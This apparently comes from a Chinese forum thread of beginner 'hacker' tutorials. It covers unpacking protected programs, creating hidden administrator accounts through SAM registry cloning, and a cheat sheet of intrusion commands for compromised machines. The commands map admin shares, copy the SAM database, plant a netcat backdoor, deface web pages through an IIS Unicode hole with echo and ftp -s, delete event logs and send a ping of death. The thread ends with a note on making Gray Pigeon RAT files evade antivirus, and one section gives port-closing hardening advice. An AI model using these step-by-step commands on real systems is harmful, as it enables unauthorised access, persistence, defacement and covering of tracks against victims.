菜鸟0起步学黑客.教程+解说+原理+工具+…{希望您成为出色的黑客}

撒旦

脱壳的各种方法介绍
一.脱壳必备基础知识:

1.PUSHAD :（压栈） 程序的入口点

2.POPAD:（出栈） 程序的出口点，与PUSHAD想对应.看到这个,就说明快到OEP了.

3.OEP:程序的入口点,软件加壳就是隐藏OEP.而我们脱壳就是为了找OEP.


二.脱壳时我们如何辨认快到OEP了呢.(快到OEP时,都有哪些共同现象).

若出现下面情况时,说明OEP就要到了:

1.跟踪时如果发现:
popad
popfd
或
popad

2.同时,紧接着,有retn ,jmp等其它跳转指令,发生跨段跳跃时.

这说明我们马上要到OEP了.


三.脱壳牢记口诀:

1.单步往前走,不要让程序向上走,遇到向上跳时,在下一句按F4,运行到所选.

2.刚载入程序,在附近就call时,我们按F7跟进去.

3.若跟踪时,运行某个call程序就运行时,这个call也用F7进入.

4.在跟踪时,出现比如 jmp XXXXXX 或者 JE XXXXXX 或者有RETN的一般很快
就会到程序的OEP。


四.脱壳的几种方法总结

方法一:单步跟踪法

1.用OD载入,选"不分析代码"

2.单步向下跟踪按F8，实现向下的跳.不让程序往回跳.

3.遇到程序往回跳的（包括循环），我们在下一句代码处按F4（或者右健单击代码，选择断点——>运行到所选）

4.如果刚载入程序，在附近就有一个CALL的，我们就F7跟进去，不然程序很容易运行.

5.在跟踪的时候，如果运行到某个CALL程序就运行的，就在这个CALL中F7进入.

6.一般遇到很大的跳转（跨段跳），比如 jmp XXXXXX 或 JE XXXXXX 或有
RETN的一般很快就会到程序的OEP。

方法二:ESP定律法

1.开始就点F8向下走，注意观察OD右上角的寄存器中ESP有没突现（变成红色）

2.在命令行下：dd XXXXXXXX(指在当前代码中的ESP地址，或者是hr XXXXXXXX)，按回车！

3.选中下断的地址，断点--->硬件访--->WORD断点。

4.按一下F9运行程序，直接来到了跳转处，按下F8向下走，就到达程序OEP。


方法三:内存镜像法

1.用OD打开,设置选项——调试选项——异常,忽略所有异常(也就是把里面的忽

略全部√上),然后CTRL+F2重载下程序！

2.按ALT+M,打开内存镜象，找到程序的第一个.rsrc.按F2下断点，然后按

SHIFT+F9运行到断点.

3.接着再按ALT+M,打开内存镜象，找到程序的第一个.rsrc.上面的.CODE，按F2

下断点！然后按SHIFT+F9，直接到达程序OEP！

方法四:一步到OEP

1.开始按Ctrl+F,输入：popad,然后按下F2下断，按F9运行到此处.

2.很快来到大跳转,按F8向下走,来到OEP.

方法五:最后一次异常法:

第一步:用OD打开程序,点击选项——调试选项——异常，把里面的√全部去掉

！CTRL+F2重载下程序.

第二步:接着我们按SHIFT+F9,直到程序运行,记下从开始按SHIFT+F9到程序运行的次数n.

第三步:重载程序,再按SHIFT+F9,这次按的次数为上次让程序运行时的次数的

n-1次.

第四步:此时观察OD的右下角有一个"SE 句柄",这时我们按CTRL+G，输入SE 句

柄前的地址！来到这个地址.

第五步:在这里,按F2下断点！然后按SHIFT+F9来到断点处！

第六步:这时候我们已经跳过了所有异常,然后去掉断点，按F8慢慢向下跟踪很

快就到达OEP了.

撒旦

建立隐藏的超级用户
一、如何在图形界面建立隐藏的超级用户
图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序），如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序，修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下：

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键：HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子（只要删除添加的帐户administrator即可）。

9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。


如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。（例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。）
2、先与肉鸡建立连接,命令为: net use 13.50.97.238ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动):at 13.50.97.238 12:51

c:winntsystem32net.exe user hacker$ 1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值：at 13.50.97.238 12:55

c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

/e 是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：copy 13.50.97.238admin$system32hacker.reg

c:hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg

7、查看肉鸡时间：net time 13.50.97.238 然后用at命令将用户hacker$删除:

at 13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use 13.50.97.238 /del 断开与肉鸡的连接。

net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接：net use 13.50.97.238ipc$ "12345678" /user:"administrator"

再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办？

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

但是这里有两个前提：1、先用net use 肉鸡ipipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务（没有开启的话，你也可以远程开启，因为你有超级用户的密码了）。

四、利用被禁用的帐户建立隐藏的超级用户：

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1．想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉；而在命令行下，我还没有想到好的办法，只能在命令行下用命令："net user 用户名"一个一个来查看用户是否被禁用。

2．在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户（克隆之后，被禁用的用户hacker就会自动被激活了）: CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。

3．如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：

net user hacker /active:no 这样用户hacker就被禁用了（至少表面上是这样的），当然你也可以将用户hacher换成其它的被禁用的用户。

4．这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗？你用这个被禁用的用户连接一下肉鸡看看是否能连上？用命令：net user 肉鸡ipipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

5．如果没有cmdshell怎么办？你可以我上面介绍的at命令来禁用用户hacker;命令格式：at 肉鸡ip 时间 net user hacker /active:no

6．原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内"C"健还是原来的"C"键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。
五、注意的几点事项：

1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。

2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。

3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过，未在NT上测试。本方法仅供研究，请勿将本方法用于破坏上，利用本方法造成严重后果者，由使用者负责，本人概不负责!

撒旦

常用命令
如果写得不好别笑啊。我觉得写这些更有用，不会像其他人一样写一些很无聊不现实的文章。当然这只是我的想法，我也有缺点的。

1：NET

只要你拥有某IP的用户名和密码，那就用IPC\$做连接吧！

这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1

net use \\127.0.0.1\ipc\$ "123456" /user:"hbx"

退出的命令是

net use \\127.0.0.1\ipc\$ /delte

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

----------------------

下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

----------------------

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\\127.0.0.1\c\$

----------------------

net start telnet

这样可以打开对方的TELNET服务.

----------------------

这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。

net user guest /active:yes

----------------------

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！

net user guest lovechina

net命令果然强大啊！

2:at

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？

那么需要用AT命令，这里假设你已经登陆了那个服务器。

你首先要得到对方的时间，

net time \\127.0.0.1

将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个<a href="http://www.51.NET" target=_blank>www.51.NET</a>,不错的.当我们申请完后 ... 密码,以及FTP服务器.

在上传前需要登陆先，这里我们假设FTP服务器是<a href="http://www.51.NET" target=_blank>www.51.NET</a>,用户名是HUCJS,密码是654321

ftp <a href="http://www.51.net" target=_blank>www.51.net</a>

他会要求输入用户,成功后会要求输入密码.

----------------------

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\

get c:\index.htm d:\

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

put c:\index.htm d:\

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC\$连接才有效。

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm \\127.0.0.1\c\$\index.htm

----------------------

如果你要复制到D盘下把C改为D，就行了！

copy index.htm \\127.0.0.1\d\$\index.htm

----------------------

如果你要把他复制到WINNT目录里

就要把输入

copy index.htm \\127.0.0.1\admin\$\index.htm

admin\$是winnt

----------------------

要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

copy \\127.0.0.1\admin\$\repair\sam._ c:\

----------------------

6：set

如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！

下面是我得到的结果！我来分析它，只是找主页在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=\$P\$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。

7：nbtstat

如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！

现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP


粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。

这里的用户是PENTIUMII。

8：Shutdown

关了对方的NT服务器的命令

Shutdown \\IP地址 t:20

20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。

9：DIR

这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10：echo

著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。

echo 南京大铁证如山，任何日本人不得抵赖！>index.htm

echo 南京大铁证如山，任何日本人不得抵赖！>>index.htm

第一个的意思是覆盖index.htm原有的内容，把“南京大铁证如山，任何日本人不得抵赖！”写进index.htm。

第二个的意思是把“南京大铁证如山，任何日本人不得抵赖！”加到index.htm里面。

“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。

1、首先，我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。）
open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的）
cnhack（你申请时的用户名）
test（你申请时的密码）
get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）
bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）

具体的做法：
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）

等命令完成时，文件已经下载到你指定的文件里了。

注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。）

记得要 del c:\cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12:del

当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。

NT的日志有这些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。

撒旦

如何打开和关闭端口？？
每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭无用的服务。 “控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口：关闭Simple TCP/IP Service,支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭80口：关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service"，通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口：关闭Simple Mail Transport Protocol (SMTP)服务，它提供的功能是跨网传送电子邮件。
4、关掉21端口：关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务，此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc$、c$、admin$等等，此服务关闭不影响您的共他操作。
7、还有一个就是139端口，139端口是NetBIOS Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。 关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。 对于个人用户来说，可以在各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动，端口也开放了。
每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中默认的都是这些服务开启的。对于个人用户来说确实没有必要，关掉端口也就是关闭无用的服务。
“控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口：关闭Simple TCP/IP Service,支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭80口：关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service"，通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口：关闭Simple Mail Transport Protocol (SMTP)服务，它提供的功能是跨网传送电子邮件。
4、关掉21端口：关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉23端口：关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务，此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享，比如ipc$、c$、admin$等等，此服务关闭不影响您的共他操作。
7、还有一个就是139端口，139端口是NetBIOS Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机，现在好了。
关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。
对于个人用户来说，可以在各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动，端口也开放了。


我们一般采用一些功能强大的反黑软件和防火墙来保证我们的系统安全，但是有些用户不具备上述条件。怎么办呢？下面就介绍一种简易的办法——通过限制端口来帮助大家防止非法入侵。
非法入侵的方式
简单说来，非法入侵的方式可粗略分为4种：
1、扫描端口，通过已知的系统Bug攻入主机。
2、种植木马，利用木马开辟的后门进入主机。
3、采用数据溢出的手段，迫使主机提供后门进入主机。
4、利用某些软件设计的漏洞，直接或间接控制主机。
非法入侵的主要方式是前两种，尤其是利用一些流行的黑客工具，通过第一种方式攻击主机的情况最多、也最普遍；而对后两种方式来说，只有一些手段高超的黑客才利用，波及面并不广泛，而且只要这两种问题一出现，软件服务商很快就会提供补丁，及时修复系统。
因此，如果能限制前两种非法入侵方式，就能有效防止利用黑客工具的非法入侵。而且前两种非法入侵方式有一个共同点，就是通过端口进入主机。
端口就像一所房子(服务器)的几个门一样，不同的门通向不同的房间(服务器提供的不同服务)。我们常用的FTP默认端口为21，而WWW网页一般默认端口是80。但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务，比如139等；还有一些木马程序，比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。那么，只要我们把自己用不到的端口全部封锁起来，不就杜绝了这两种非法入侵吗？
限制端口的方法
对于个人用户来说，您可以限制所有的端口，因为您根本不必让您的机器对外提供任何服务；而对于对外提供网络服务的服务器，我们需把必须利用的端口(比如WWW端口80、FTP端口21、邮件服务端口25、110等)开放，其他的端口则全部关闭。
这里，对于采用Windows 2000或者Windows XP的用户来说，不需要安装任何其他软件，可以利用“TCP/IP筛选”功能限制服务器的端口。具体设置如下：
1、右键点击“网上邻居”，选择“属性”，然后双击“本地连接”(如果是拨号上网用户，选择“我的连接”图标)，弹出“本地连接状态”对话框。
2、点击[属性]按钮，弹出“本地连接属性”，选择“此连接使用下列项目”中的“Internet协议(TCP/IP)”，然后点击[属性]按钮。
3、在弹出的“Internet协议(TCP/IP)”对话框中点击[高级]按钮。在弹出的“高级TCP/IP设置”中，选择“选项”标签，选中“TCP/IP筛选”，然后点击[属性]按钮。
4、在弹出的“TCP/IP筛选”对话框里选择“启用TCP/IP筛选”的复选框，然后把左边“TCP端口”上的“只允许”选上(请见附图)。
这样，您就可以来自己添加或删除您的TCP或UDP或IP的各种端口了。
添加或者删除完毕，重新启动机器以后，您的服务器就被保护起来了。
如果只上网浏览的话，可以不添加任何端口。但是要利用一些网络联络工具，比如OICQ的话，就要把“4000”这个端口打开，同理，如果发现某个常用的网络工具不能起作用的时候，请搞清它在您主机所开的端口，然后在“TCP/IP筛选”中添加端口即可。
参考资料：<a href=&#39;http://blog.wxedu.net/user1/210/archives/2005/3327.shtml&#39; target=_blank>http://blog.wxedu.net/user1/210/archives/2005/3327.shtml</a>

撒旦

DOS命令
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
net use h: \\ip\c$ 登陆后映射对方C：到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名　密码　/add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：***istrator后加s用复数
net start 查看开启了哪些服务
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C：共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况，常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

撒旦

加花免杀方法
首先在制作好的(鸽子服务端)导出maindll.dll文件

再maindll.dll文件里导出getkey.dll文件,让getkey.dll加花

